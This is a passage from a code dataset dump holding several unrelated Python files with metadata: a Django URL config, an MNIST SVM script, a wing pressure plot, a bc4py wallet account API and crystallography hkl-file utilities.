trip\n\t#url(r'^show_trip$', views.show_trip),\n\turl(r'^show_trip/(?P\\d+)$', views.show_trip),\n\turl(r'^join/(?P\\d+)$', views.join),\n\t#url(r'^travels/destination/$,' views.show),\n\t#url(r'^travels/add$),' views.add),\n]", "sub_path": "apps/travel/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 605, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "51", "api": [{"api_name": "django.conf.urls.url", "line_number": 5, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 6, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 7, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 8, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 9, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 10, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 11, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 12, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 14, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 15, "usage_type": "call"}]} +{"seq_id": "148400151", "text": "\nimport pandas as pd\nimport numpy as np\ntrain=pd.read_csv('data/train.csv')\nX_train=train.iloc[:,1:]\nX_train[X_train>0]=1\nY_train=train.iloc[:,0]\nfrom sklearn.feature_selection import VarianceThreshold\n#X_train.std(axis=0)\nsel = VarianceThreshold(threshold=(1e-2))\nsel.fit(X_train)\nX_train=sel.transform(X_train)\nX_test=pd.read_csv('data/test.csv')\nX_test[X_test>0]=1\nX_test=sel.transform(X_test)\n\n\nfrom sklearn import decomposition\n#pca = decomposition.PCA()\n#pca.fit(X_train)\n#pca.explained_variance_[pca.explained_variance_>1].size\n#from matplotlib import pyplot as plt\n#plt.plot(np.arange(0,X_train.shape[1],1),np.cumsum(pca.explained_variance_)/np.sum(pca.explained_variance_))\n#plt.hlines(xmax=X_train.shape[1],xmin=0,y=0.9)\n#pca = decomposition.PCA(n_components=75)\n#pca.fit(X_train)\n#X_train_pca=pca.transform(X_train)\n#X_test_pca=pca.transform(X_test)\n\nfrom sklearn import svm\nfrom sklearn.model_selection import GridSearchCV\nsvc = svm.SVC(kernel='linear')\ngsvc=GridSearchCV(estimator=svc, param_grid=dict(C=np.array([0.01,0.05,0.1,0.2,0.5,1])),n_jobs=-1)\n#gsvc.fit(X_train_pca,Y_train)\ngsvc.fit(X_train,Y_train)\n\n#Label=gsvc.predict(X_test_pca)\nLabel=gsvc.predict(X_test)\nprediction=pd.DataFrame({'ImageId':np.arange(1,X_test.shape[0]+1,1),'Label':Label})\nprediction.to_csv('data/submision.csv')\n\n\n\n\n", "sub_path": "kaggle_MNIST/pca_svm.py", "file_name": "pca_svm.py", "file_ext": "py", "file_size_in_byte": 1310, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "51", "api": [{"api_name": "pandas.read_csv", "line_number": 4, "usage_type": "call"}, {"api_name": "sklearn.feature_selection.VarianceThreshold", "line_number": 10, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 13, "usage_type": "call"}, {"api_name": "sklearn.svm.SVC", "line_number": 32, "usage_type": "call"}, {"api_name": "sklearn.svm", "line_number": 32, "usage_type": "name"}, {"api_name": "sklearn.model_selection.GridSearchCV", "line_number": 33, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 33, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 39, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 39, "usage_type": "call"}]} +{"seq_id": "158113343", "text": "import matplotlib.pyplot as plt\n#from matplotlib.mlab import griddata\nfrom scipy.interpolate import griddata\nimport numpy as np\nfrom pylab import savefig\n\nplt.rc('font',family='serif')\n#plt.rc('font',**{'family':'serif','serif':['Palatino']})\n#plt.rc('text', usetex=True)\n\nfig = plt.figure()\nax = fig.add_subplot(111)\n\nf = open('outputdata/dp_coeff.txt', 'r')\n\nx_list = []\ny_list = []\nz_list = []\nx_list_neg = []\ny_list_rev = []\n\ndata = f.readline()\nheading = f.readline()\n\nfor l in f:\n lstr = l.split()\n x_list.append(float(lstr[1]))\n x_list_neg.append(-float(lstr[1]))\n y_list.append(float(lstr[0]))\n z_list.append(float(lstr[2]))\n \ny_max = max(y_list)\n\nfor i in range(len(y_list)):\n y_list_rev.append(y_max-y_list[i])\n \n# pressure coefficient contour graph for right side of wing \nxc = np.linspace(min(x_list), max(x_list), num=500)\nyc = np.linspace(min(y_list_rev), max(y_list_rev), num = 500)\nx_grid, y_grid = np.meshgrid(xc,yc)\n# zip gives paired value\nzc = griddata(zip(x_list, y_list_rev), z_list, (x_grid, y_grid), method='cubic')\ncp = ax.contourf(xc, yc, zc)\n\n# for left side of wing\nxcL = np.linspace(min(x_list_neg), max(x_list_neg), num=500)\nx_grid_neg, y_grid = np.meshgrid(xcL, yc)\nzcL = griddata(zip(x_list_neg, y_list_rev), z_list, (x_grid_neg, y_grid), method='cubic')\nax.contourf(xcL, yc, zcL)\n\nplt.colorbar(cp)\nplt.title(\"Pressure Coefficient at Different Regions of the Wing\")\nplt.text(min(x_list_neg)*0.95,max(y_list)*0.85,data,fontsize=10)\nplt.xlabel('Spanwise Length')\nplt.ylabel('Chordwise Length')\n\nsavefig('figures/dp_coeff.png')\n\nplt.show()\n\nf.close()\n", "sub_path": "v0.0_vlm/dp_coeff.py", "file_name": "dp_coeff.py", "file_ext": "py", "file_size_in_byte": 1607, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "51", "api": [{"api_name": "matplotlib.pyplot.rc", "line_number": 7, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 7, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 11, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 11, "usage_type": "name"}, {"api_name": "numpy.linspace", "line_number": 38, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 39, "usage_type": "call"}, {"api_name": "numpy.meshgrid", "line_number": 40, "usage_type": "call"}, {"api_name": "scipy.interpolate.griddata", "line_number": 42, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 46, "usage_type": "call"}, {"api_name": "numpy.meshgrid", "line_number": 47, "usage_type": "call"}, {"api_name": "scipy.interpolate.griddata", "line_number": 48, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.colorbar", "line_number": 51, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 51, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 52, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 52, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.text", "line_number": 53, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 53, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 54, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 54, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 55, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 55, "usage_type": "name"}, {"api_name": "pylab.savefig", "line_number": 57, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.show", "line_number": 59, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 59, "usage_type": "name"}]} +{"seq_id": "174837651", "text": "from bc4py.config import C, V, BlockChainError\nfrom bc4py.bip32 import convert_address, addr2bin\nfrom bc4py.user import Balance\nfrom bc4py.user.api import utils\nfrom bc4py.database.builder import chain_builder, user_account\nfrom bc4py.database.create import create_db\nfrom bc4py.database.account import *\nfrom bc4py.database.tools import get_unspents_iter, get_my_unspents_iter\nfrom aiohttp import web\n\n\nasync def list_balance(request):\n confirm = int(request.query.get('confirm', 6))\n data = dict()\n with create_db(V.DB_ACCOUNT_PATH) as db:\n cur = db.cursor()\n users = user_account.get_balance(confirm=confirm, outer_cur=cur)\n for user, balance in users.items():\n data[read_userid2name(user, cur)] = dict(balance)\n return utils.json_res(data)\n\n\nasync def list_transactions(request):\n page = int(request.query.get('page', 0))\n limit = int(request.query.get('limit', 25))\n data = list()\n f_next_page = False\n start = page * limit\n for tx_dict in user_account.get_movement_iter(start=page, f_dict=True):\n if limit == 0:\n f_next_page = True\n break\n tx_dict['index'] = start\n data.append(tx_dict)\n start += 1\n limit -= 1\n return utils.json_res({'txs': data, 'next': f_next_page})\n\n\nasync def list_unspents(request):\n if not chain_builder.db.db_config['addrindex']:\n return utils.error_res('address isn\\'t full indexed')\n try:\n best_height = chain_builder.best_block.height\n page = int(request.query.get('page', 0))\n limit = min(100, int(request.query.get('limit', 25)))\n start = page * limit\n finish = (page+1) * limit - 1\n f_next_page = False\n target_address = request.query['address']\n unspents_iter = get_unspents_iter(target_address=set(target_address.split(',')))\n data = list()\n for index, (address, height, txhash, txindex, coin_id, amount) in enumerate(unspents_iter):\n if finish < index:\n f_next_page = True\n break\n if index < start:\n continue\n data.append({\n 'address': address,\n 'height': height,\n 'confirmed': None if height is None else best_height - height,\n 'txhash': txhash.hex(),\n 'txindex': txindex,\n 'coin_id': coin_id,\n 'amount': amount\n })\n return utils.json_res({'data': data, 'next': f_next_page})\n except Exception:\n return utils.error_res()\n\n\nasync def list_private_unspents(request):\n data = list()\n best_height = chain_builder.best_block.height\n with create_db(V.DB_ACCOUNT_PATH) as db:\n cur = db.cursor()\n for address, height, txhash, txindex, coin_id, amount in get_my_unspents_iter(cur):\n data.append({\n 'address': address,\n 'height': height,\n 'confirmed': None if height is None else best_height - height,\n 'txhash': txhash.hex(),\n 'txindex': txindex,\n 'coin_id': coin_id,\n 'amount': amount\n })\n return utils.json_res(data)\n\n\nasync def list_account_address(request):\n with create_db(V.DB_ACCOUNT_PATH) as db:\n cur = db.cursor()\n user_name = request.query.get('account', C.account2name[C.ANT_UNKNOWN])\n user_id = read_name2userid(user_name, cur)\n address_list = list()\n for uuid, address, user in read_pooled_address_iter(cur):\n if user_id == user:\n if user == C.ANT_VALIDATOR:\n address_list.append(convert_address(ck=address, hrp=V.BECH32_HRP, ver=C.ADDR_VALIDATOR_VER))\n elif user == C.ANT_CONTRACT:\n address_list.append(convert_address(ck=address, hrp=V.BECH32_HRP, ver=C.ADDR_CONTRACT_VER))\n else:\n address_list.append(address)\n return utils.json_res({'account': user_name, 'user_id': user_id, 'address': address_list})\n\n\nasync def move_one(request):\n try:\n post = await utils.content_type_json_check(request)\n ant_from = post.get('from', C.account2name[C.ANT_UNKNOWN])\n ant_to = post['to']\n coin_id = int(post.get('coin_id', 0))\n amount = int(post['amount'])\n coins = Balance(coin_id, amount)\n with create_db(V.DB_ACCOUNT_PATH, f_strict=True) as db:\n cur = db.cursor()\n _from = read_name2userid(ant_from, cur)\n _to = read_name2userid(ant_to, cur)\n txhash = user_account.move_balance(_from, _to, coins, cur)\n db.commit()\n return utils.json_res({'txhash': txhash.hex(), 'from_id': _from, 'to_id': _to})\n except Exception:\n return utils.error_res()\n\n\nasync def move_many(request):\n try:\n post = await utils.content_type_json_check(request)\n ant_from = post.get('from', C.account2name[C.ANT_UNKNOWN])\n ant_to = post['to']\n coins = Balance()\n for k, v in post['coins'].items():\n coins[int(k)] += int(v)\n with create_db(V.DB_ACCOUNT_PATH, f_strict=True) as db:\n cur = db.cursor()\n _from = read_name2userid(ant_from, cur)\n _to = read_name2userid(ant_to, cur)\n txhash = user_account.move_balance(_from, _to, coins, cur)\n db.commit()\n return utils.json_res({'txhash': txhash.hex(), 'from_id': _from, 'to_id': _to})\n except Exception as e:\n return web.Response(text=str(e), status=400)\n\n\nasync def new_address(request):\n with create_db(V.DB_ACCOUNT_PATH) as db:\n cur = db.cursor()\n user_name = request.query.get('account', C.account2name[C.ANT_UNKNOWN])\n user_id = read_name2userid(user_name, cur)\n address = generate_new_address_by_userid(user_id, cur)\n db.commit()\n if user_id == C.ANT_VALIDATOR:\n address = convert_address(ck=address, hrp=V.BECH32_HRP, ver=C.ADDR_VALIDATOR_VER)\n if user_id == C.ANT_CONTRACT:\n address = convert_address(ck=address, hrp=V.BECH32_HRP, ver=C.ADDR_CONTRACT_VER)\n ver_identifier = addr2bin(hrp=V.BECH32_HRP, ck=address)\n return utils.json_res({\n 'account': user_name,\n 'user_id': user_id,\n 'address': address,\n 'version': ver_identifier[0],\n 'identifier': ver_identifier[1:].hex(),\n })\n\n\nasync def get_keypair(request):\n try:\n with create_db(V.DB_ACCOUNT_PATH) as db:\n cur = db.cursor()\n address = request.query['address']\n uuid, keypair, path = read_address2keypair(address, cur)\n return utils.json_res({\n 'uuid': uuid,\n 'address': address,\n 'private_key': keypair.get_secret_key().hex(),\n 'public_key': keypair.get_public_key().hex(),\n 'path': path\n })\n except Exception:\n return utils.error_res()\n\n\n__all__ = [\n \"list_balance\",\n \"list_transactions\",\n \"list_unspents\",\n \"list_private_unspents\",\n \"list_account_address\",\n \"move_one\",\n \"move_many\",\n \"new_address\",\n \"get_keypair\",\n]\n", "sub_path": "bc4py/user/api/accountinfo.py", "file_name": "accountinfo.py", "file_ext": "py", "file_size_in_byte": 7210, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "51", "api": [{"api_name": "bc4py.database.create.create_db", "line_number": 15, "usage_type": "call"}, {"api_name": "bc4py.config.V.DB_ACCOUNT_PATH", "line_number": 15, "usage_type": "attribute"}, {"api_name": "bc4py.config.V", "line_number": 15, "usage_type": "name"}, {"api_name": "bc4py.database.builder.user_account.get_balance", "line_number": 17, "usage_type": "call"}, {"api_name": "bc4py.database.builder.user_account", "line_number": 17, "usage_type": "name"}, {"api_name": "bc4py.user.api.utils.json_res", "line_number": 20, "usage_type": "call"}, {"api_name": "bc4py.user.api.utils", "line_number": 20, "usage_type": "name"}, {"api_name": "bc4py.database.builder.user_account.get_movement_iter", "line_number": 29, "usage_type": "call"}, {"api_name": "bc4py.database.builder.user_account", "line_number": 29, "usage_type": "name"}, {"api_name": "bc4py.user.api.utils.json_res", "line_number": 37, "usage_type": "call"}, {"api_name": "bc4py.user.api.utils", "line_number": 37, "usage_type": "name"}, {"api_name": "bc4py.database.builder.chain_builder.db", "line_number": 41, "usage_type": "attribute"}, {"api_name": "bc4py.database.builder.chain_builder", "line_number": 41, "usage_type": "name"}, {"api_name": "bc4py.user.api.utils.error_res", "line_number": 42, "usage_type": "call"}, {"api_name": "bc4py.user.api.utils", "line_number": 42, "usage_type": "name"}, {"api_name": "bc4py.database.builder.chain_builder.best_block", "line_number": 44, "usage_type": "attribute"}, {"api_name": "bc4py.database.builder.chain_builder", "line_number": 44, "usage_type": "name"}, {"api_name": "bc4py.database.tools.get_unspents_iter", "line_number": 51, "usage_type": "call"}, {"api_name": "bc4py.user.api.utils.json_res", "line_number": 68, "usage_type": "call"}, {"api_name": "bc4py.user.api.utils", "line_number": 68, "usage_type": "name"}, {"api_name": "bc4py.user.api.utils.error_res", "line_number": 70, "usage_type": "call"}, {"api_name": "bc4py.user.api.utils", "line_number": 70, "usage_type": "name"}, {"api_name": "bc4py.database.builder.chain_builder.best_block", "line_number": 75, "usage_type": "attribute"}, {"api_name": "bc4py.database.builder.chain_builder", "line_number": 75, "usage_type": "name"}, {"api_name": "bc4py.database.create.create_db", "line_number": 76, "usage_type": "call"}, {"api_name": "bc4py.config.V.DB_ACCOUNT_PATH", "line_number": 76, "usage_type": "attribute"}, {"api_name": "bc4py.config.V", "line_number": 76, "usage_type": "name"}, {"api_name": "bc4py.database.tools.get_my_unspents_iter", "line_number": 78, "usage_type": "call"}, {"api_name": "bc4py.user.api.utils.json_res", "line_number": 88, "usage_type": "call"}, {"api_name": "bc4py.user.api.utils", "line_number": 88, "usage_type": "name"}, {"api_name": "bc4py.database.create.create_db", "line_number": 92, "usage_type": "call"}, {"api_name": "bc4py.config.V.DB_ACCOUNT_PATH", "line_number": 92, "usage_type": "attribute"}, {"api_name": "bc4py.config.V", "line_number": 92, "usage_type": "name"}, {"api_name": "bc4py.config.C.account2name", "line_number": 94, "usage_type": "attribute"}, {"api_name": "bc4py.config.C", "line_number": 94, "usage_type": "name"}, {"api_name": "bc4py.config.C.ANT_UNKNOWN", "line_number": 94, "usage_type": "attribute"}, {"api_name": "bc4py.config.C.ANT_VALIDATOR", "line_number": 99, "usage_type": "attribute"}, {"api_name": "bc4py.config.C", "line_number": 99, "usage_type": "name"}, {"api_name": "bc4py.bip32.convert_address", "line_number": 100, "usage_type": "call"}, {"api_name": "bc4py.config.V.BECH32_HRP", "line_number": 100, "usage_type": "attribute"}, {"api_name": "bc4py.config.V", "line_number": 100, "usage_type": "name"}, {"api_name": "bc4py.config.C.ADDR_VALIDATOR_VER", "line_number": 100, "usage_type": "attribute"}, {"api_name": "bc4py.config.C", "line_number": 100, "usage_type": "name"}, {"api_name": "bc4py.config.C.ANT_CONTRACT", "line_number": 101, "usage_type": "attribute"}, {"api_name": "bc4py.config.C", "line_number": 101, "usage_type": "name"}, {"api_name": "bc4py.bip32.convert_address", "line_number": 102, "usage_type": "call"}, {"api_name": "bc4py.config.V.BECH32_HRP", "line_number": 102, "usage_type": "attribute"}, {"api_name": "bc4py.config.V", "line_number": 102, "usage_type": "name"}, {"api_name": "bc4py.config.C.ADDR_CONTRACT_VER", "line_number": 102, "usage_type": "attribute"}, {"api_name": "bc4py.config.C", "line_number": 102, "usage_type": "name"}, {"api_name": "bc4py.user.api.utils.json_res", "line_number": 105, "usage_type": "call"}, {"api_name": "bc4py.user.api.utils", "line_number": 105, "usage_type": "name"}, {"api_name": "bc4py.user.api.utils.content_type_json_check", "line_number": 110, "usage_type": "call"}, {"api_name": "bc4py.user.api.utils", "line_number": 110, "usage_type": "name"}, {"api_name": "bc4py.config.C.account2name", "line_number": 111, "usage_type": "attribute"}, {"api_name": "bc4py.config.C", "line_number": 111, "usage_type": "name"}, {"api_name": "bc4py.config.C.ANT_UNKNOWN", "line_number": 111, "usage_type": "attribute"}, {"api_name": "bc4py.user.Balance", "line_number": 115, "usage_type": "call"}, {"api_name": "bc4py.database.create.create_db", "line_number": 116, "usage_type": "call"}, {"api_name": "bc4py.config.V.DB_ACCOUNT_PATH", "line_number": 116, "usage_type": "attribute"}, {"api_name": "bc4py.config.V", "line_number": 116, "usage_type": "name"}, {"api_name": "bc4py.database.builder.user_account.move_balance", "line_number": 120, "usage_type": "call"}, {"api_name": "bc4py.database.builder.user_account", "line_number": 120, "usage_type": "name"}, {"api_name": "bc4py.user.api.utils.json_res", "line_number": 122, "usage_type": "call"}, {"api_name": "bc4py.user.api.utils", "line_number": 122, "usage_type": "name"}, {"api_name": "bc4py.user.api.utils.error_res", "line_number": 124, "usage_type": "call"}, {"api_name": "bc4py.user.api.utils", "line_number": 124, "usage_type": "name"}, {"api_name": "bc4py.user.api.utils.content_type_json_check", "line_number": 129, "usage_type": "call"}, {"api_name": "bc4py.user.api.utils", "line_number": 129, "usage_type": "name"}, {"api_name": "bc4py.config.C.account2name", "line_number": 130, "usage_type": "attribute"}, {"api_name": "bc4py.config.C", "line_number": 130, "usage_type": "name"}, {"api_name": "bc4py.config.C.ANT_UNKNOWN", "line_number": 130, "usage_type": "attribute"}, {"api_name": "bc4py.user.Balance", "line_number": 132, "usage_type": "call"}, {"api_name": "bc4py.database.create.create_db", "line_number": 135, "usage_type": "call"}, {"api_name": "bc4py.config.V.DB_ACCOUNT_PATH", "line_number": 135, "usage_type": "attribute"}, {"api_name": "bc4py.config.V", "line_number": 135, "usage_type": "name"}, {"api_name": "bc4py.database.builder.user_account.move_balance", "line_number": 139, "usage_type": "call"}, {"api_name": "bc4py.database.builder.user_account", "line_number": 139, "usage_type": "name"}, {"api_name": "bc4py.user.api.utils.json_res", "line_number": 141, "usage_type": "call"}, {"api_name": "bc4py.user.api.utils", "line_number": 141, "usage_type": "name"}, {"api_name": "aiohttp.web.Response", "line_number": 143, "usage_type": "call"}, {"api_name": "aiohttp.web", "line_number": 143, "usage_type": "name"}, {"api_name": "bc4py.database.create.create_db", "line_number": 147, "usage_type": "call"}, {"api_name": "bc4py.config.V.DB_ACCOUNT_PATH", "line_number": 147, "usage_type": "attribute"}, {"api_name": "bc4py.config.V", "line_number": 147, "usage_type": "name"}, {"api_name": "bc4py.config.C.account2name", "line_number": 149, "usage_type": "attribute"}, {"api_name": "bc4py.config.C", "line_number": 149, "usage_type": "name"}, {"api_name": "bc4py.config.C.ANT_UNKNOWN", "line_number": 149, "usage_type": "attribute"}, {"api_name": "bc4py.config.C.ANT_VALIDATOR", "line_number": 153, "usage_type": "attribute"}, {"api_name": "bc4py.config.C", "line_number": 153, "usage_type": "name"}, {"api_name": "bc4py.bip32.convert_address", "line_number": 154, "usage_type": "call"}, {"api_name": "bc4py.config.V.BECH32_HRP", "line_number": 154, "usage_type": "attribute"}, {"api_name": "bc4py.config.V", "line_number": 154, "usage_type": "name"}, {"api_name": "bc4py.config.C.ADDR_VALIDATOR_VER", "line_number": 154, "usage_type": "attribute"}, {"api_name": "bc4py.config.C", "line_number": 154, "usage_type": "name"}, {"api_name": "bc4py.config.C.ANT_CONTRACT", "line_number": 155, "usage_type": "attribute"}, {"api_name": "bc4py.config.C", "line_number": 155, "usage_type": "name"}, {"api_name": "bc4py.bip32.convert_address", "line_number": 156, "usage_type": "call"}, {"api_name": "bc4py.config.V.BECH32_HRP", "line_number": 156, "usage_type": "attribute"}, {"api_name": "bc4py.config.V", "line_number": 156, "usage_type": "name"}, {"api_name": "bc4py.config.C.ADDR_CONTRACT_VER", "line_number": 156, "usage_type": "attribute"}, {"api_name": "bc4py.config.C", "line_number": 156, "usage_type": "name"}, {"api_name": "bc4py.bip32.addr2bin", "line_number": 157, "usage_type": "call"}, {"api_name": "bc4py.config.V.BECH32_HRP", "line_number": 157, "usage_type": "attribute"}, {"api_name": "bc4py.config.V", "line_number": 157, "usage_type": "name"}, {"api_name": "bc4py.user.api.utils.json_res", "line_number": 158, "usage_type": "call"}, {"api_name": "bc4py.user.api.utils", "line_number": 158, "usage_type": "name"}, {"api_name": "bc4py.database.create.create_db", "line_number": 169, "usage_type": "call"}, {"api_name": "bc4py.config.V.DB_ACCOUNT_PATH", "line_number": 169, "usage_type": "attribute"}, {"api_name": "bc4py.config.V", "line_number": 169, "usage_type": "name"}, {"api_name": "bc4py.user.api.utils.json_res", "line_number": 173, "usage_type": "call"}, {"api_name": "bc4py.user.api.utils", "line_number": 173, "usage_type": "name"}, {"api_name": "bc4py.user.api.utils.error_res", "line_number": 181, "usage_type": "call"}, {"api_name": "bc4py.user.api.utils", "line_number": 181, "usage_type": "name"}]} +{"seq_id": "396338854", "text": "import numpy as np\nimport matplotlib.pyplot as plt\n\nI = np.linspace(0,1,1000)\nL=[]\nJ=[]\nfor j in I:\n for k in np.linspace(-10,10,10000):\n if round(k/2,2) == round(j*(1+(4/3)*k**2)**2,2):\n L.append(k)\n J.append(1)\n else:\n J.append(0)\n print(len(L))\nplt.plot(L)\nplt.plot(J,\"r\")\nplt.show()", "sub_path": "SiC 1/Hyst at 30K/carlos.py", "file_name": "carlos.py", "file_ext": "py", "file_size_in_byte": 339, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "numpy.linspace", "line_number": 4, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 8, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 15, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 15, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 16, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 16, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 17, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 17, "usage_type": "name"}]} +{"seq_id": "89166681", "text": "import numpy as np \nfrom symmetry_related_reflection_generator import sym_rela_ref\nimport diffpy.structure as dst\nimport ctypes as ct\nlibsginfo = ct.CDLL(\"./libsginfo.so\") # load sginfo to use the functions written by c language\n\ndef read_hkl(filename): \n \"\"\"\n function to read hkl file. which has a format of (3i4, f8.2)\n\n filename: name of you hkl file. e.g. ‘COF300.hkl’\n\n Reture: data, a list include 5 list of h, k, l, Intensity and Sigma.\n \"\"\"\n h, k, l, Inte, Sigma = [], [], [], [], [] # creat 5 list to store the 5 column\n data = [] # use one list to store the 5 list \n with open(filename, 'r') as file2read:\n while True:\n lines = file2read.readline()\n if not lines:\n break \n h.append(int(lines[0:4].strip()))\n k.append(int(lines[4:8].strip()))\n l.append(int(lines[8:12].strip()))\n Inte.append(float(lines[12:20].strip()))\n Sigma.append(float(lines[20:28].strip()))\n pass \n pass\n if len(h) == len(k) == len(l) == len(Inte) == len(Sigma): # make sure the length of all list are same\n data.append(h)\n data.append(k)\n data.append(l)\n data.append(Inte)\n data.append(Sigma)\n return data\n else:\n print(\"There must be something wrong!\") # otherwise, return error\n pass\n\ndef produce_new_hkl(data, new_hkl= \"new.hkl\"): \n \"\"\"\n function to generate new hkl file from merged data.\n\n data: merged data, a list include 5 list of h, k, l, Intensity and Sigma.\n\n new_data: filename of your merged data to generated hkl file. whatever name you want, e.g. 'sky_worker.hkl'. default name of 'new.hkl'\n\n Return: merged hkl file.\n \"\"\"\n with open(new_hkl, 'w') as fl_w:\n if len(data[0]) == len(data[1]) == len(data[2]) == len(data[3]) == len(data[4]):\n for i in range(len(data[0])):\n h1_temp, k1_temp, l1_temp = str(data[0][i]).rjust(4, \" \"), str(data[1][i]).rjust(4, \" \"), str(data[2][i]).rjust(4, \" \") # formatting the str\n Inte1_temp, Sigma1_temp = float(data[3][i]), float(data[4][i])\n Inte1_temp, Sigma1_temp = \"{0:>8.2f}\".format(Inte1_temp), \"{0:>8.2f}\".format(Sigma1_temp) # formatting the str\n fl_w.write(h1_temp)\n fl_w.write(k1_temp)\n fl_w.write(l1_temp)\n fl_w.write(Inte1_temp)\n fl_w.write(Sigma1_temp)\n fl_w.write('\\n')\n else:\n print(\"There must be something wrong!\")\n pass\n\ndef produce_new_hkl2(data2, new_data= \"new.hkl\"): \n \"\"\"\n function to generate hkl file from numpy array data.\n\n data2: numpy array, n x 5.\n\n Return: a new hkl file.\n \"\"\"\n with open(new_data, 'w') as fl_w:\n if len(data2[:, 0]):\n for i in range(len(data2[:, 0])):\n h1_temp, k1_temp, l1_temp = str(int(data2[i][0])).rjust(4, \" \"), str(int(data2[i][1])).rjust(4, \" \"), str(int(data2[i][2])).rjust(4, \" \") # formatting the str\n Inte1_temp, Sigma1_temp = float(data2[i][3]), float(data2[i][4])\n Inte1_temp, Sigma1_temp = \"{0:>8.2f}\".format(Inte1_temp), \"{0:>8.2f}\".format(Sigma1_temp) # formatting the str\n fl_w.write(h1_temp)\n fl_w.write(k1_temp)\n fl_w.write(l1_temp)\n fl_w.write(Inte1_temp)\n fl_w.write(Sigma1_temp)\n fl_w.write('\\n')\n else:\n print(\"There must be something wrong!\")\n pass\n\ndef theta_intensity(filename_hkl, crystal_system, a, b, c, alpha, beta, gamma, wavelength, threshold_min, threshold_max):\n \"\"\"\n function to return a list of intensity against 2theta value.\n\n filename_hkl: string, e.g. 'MFI.hkl'.\n \n crystal_system: e.g. 'cubic'.\n\n a, b, c, alpha, beta, gamma: unti cell parameters.\n\n threshold: threshold of d value.\n \"\"\"\n data = read_hkl(filename_hkl)\n theta_list = []\n inte_list = []\n for i in range(len(data[0])):\n d_value = dhkl_cal2(crystal_system, a, b, c, alpha, beta, gamma, data[0][i], data[1][i] , data[2][i])\n if d_value > threshold_min and d_value < threshold_max:\n two_theta = 2*np.arcsin(wavelength / (2*d_value)) * 180 / np.pi\n theta_list.append(two_theta)\n inte_list.append(data[3][i])\n return np.array(theta_list), np.array(inte_list)\n\nimport matplotlib.pyplot as plt\ndef plot_theta_intensity(theta_list, inte_list):\n \"\"\"\n function to plot intensity against 2theta.\n \"\"\"\n theta_list, inte_list = np.array(theta_list), np.array(inte_list)\n plt.figure(figsize=(22, 5), dpi=80)\n plt.xlabel(\"2 theta, wavelength = 0.02508 angstrom\")\n plt.ylabel(\"Intensity\")\n plt.scatter(theta_list, inte_list, s = 30, c='blue')\n plt.show()\n\ndef intensity_monitor(filename_hkl, crystal_system, a, b, c, alpha, beta, gamma, wavelength = 0.02508, threshold_min = 1.0, threshold_max = 50):\n \"\"\"\n function to monitor the intensity variation against 2theta value.\n\n crystal_system: e.g. 'cubic'.\n\n a, b, c, alpha, beta, gamma: unit cell parameters.\n\n threshold: threshold of d value.\n \"\"\"\n theta_list, inte_list = theta_intensity(filename_hkl, crystal_system, a, b, c, alpha, beta, gamma, wavelength, threshold_min, threshold_max)\n return plot_theta_intensity(theta_list, inte_list)\n\ndef compare2data(filename_hkl1, filename_hkl2, crystal_system, a, b, c, alpha, beta, gamma, scale=1.0, wavelength=0.02508, threshold_min=1.0, threshold_max=50):\n \"\"\"\n function to compare the intensity variation of 2 hkl data.\n\n filename_hkl1, filename_hkl2: string, e.g. 'MFI.hkl'. \n\n crystal_system: e.g. 'cubic'.\n\n a, b, c, alpha, beta, gamma: unit cell parameters.\n\n scale: the scale added to hkl2 to check the two data.\n \"\"\"\n theta_list1, inte_list1 = theta_intensity(filename_hkl1, crystal_system, a, b, c, alpha, beta, gamma, wavelength, threshold_min, threshold_max)\n theta_list2, inte_list2 = theta_intensity(filename_hkl2, crystal_system, a, b, c, alpha, beta, gamma, wavelength, threshold_min, threshold_max)\n theta_list1, inte_list1 = np.array(theta_list1), np.array(inte_list1)\n theta_list2, inte_list2 = np.array(theta_list2), np.array(inte_list2) * scale\n 